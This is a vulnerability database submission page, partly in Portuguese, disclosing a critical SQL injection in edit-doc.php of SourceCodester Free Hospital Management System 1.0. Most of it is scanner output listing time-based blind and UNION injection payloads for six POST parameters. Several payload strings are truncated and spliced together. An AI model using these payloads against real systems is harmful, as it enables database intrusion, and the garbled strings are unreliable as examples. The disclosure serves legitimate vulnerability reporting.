Submeter #195608: A vulnerability classified as critical has been found in SourceCodester Free Hospital Management System for Small Practices 1.0informação

TítuloA vulnerability classified as critical has been found in SourceCodester Free Hospital Management System for Small Practices 1.0
DescriçãoA vulnerability classified as critical has been found in SourceCodester Free Hospital Management System for Small Practices 1.0. Affected is an unknown function of the file vm\doctor\edit-doc.php The manipulation of the argument $id00,$nic,$oldemail,$email,$spec,$Tele leads to sql injection ``` Parameter: id00 (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id00=2' AND (SELECT 3966 FROM (SELECT(SLEEP(5)))CuGj) AND 'fhTa'='for.com&name=Dr.Akash Sanap&nic=234&Tele=8080808080&spec=1&password=doctor&cpassw Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: id00=-8690' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a4796872624b4e6f68496e55726767636669596c6d,0x7178707a71),NULL-- -&oldemail=doctorh Sanap&nic=234&Tele=8080808080&spec=1&password=doctor&cpassword=doctor Parameter: nic (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id00=2&[email protected]&[email protected]&name=Dr.AT(SLEEP(5)))GcPL) AND 'lCet'='lCet&Tele=8080808080&spec=1&password=doctor&cpassw Parameter: oldemail (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id00=2&[email protected]' AND (SELECT 9085 FROM (SELECT(SLor.com&name=Dr.Akash Sanap&nic=234&Tele=8080808080&spec=1&password=doctor&cpassw Parameter: email (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id00=2&[email protected]&[email protected]' AND (SEL='MEHA&name=Dr.Akash Sanap&nic=234&Tele=8080808080&spec=1&password=doctor&cpassw Parameter: spec (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id00=2&[email protected]&[email protected]&name=Dr.AELECT 8937 FROM (SELECT(SLEEP(5)))anOk)&password=doctor&cpassword=doctor Parameter: Tele (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id00=2&[email protected]&[email protected]&name=Dr.A4213 FROM (SELECT(SLEEP(5)))NXCf) AND 'Mnoz'='Mnoz&spec=1&password=doctor&cpassw ```
Fonte⚠️ https://github.com/CookedMelon/cve/tree/master/hospital/doctor-edit
Utilizador
 CookedMelon (UID 52513)
Submissão15/08/2023 17h19 (há 3 anos)
Moderação20/08/2023 09h01 (5 days later)
EstadoAceite
Entrada VulDB237564 [SourceCodester Free Hospital Management System for Small Practices vm\doctor\edit-doc.php Injeção SQL]
Pontos20

Do you know our Splunk app?

Download it now for free!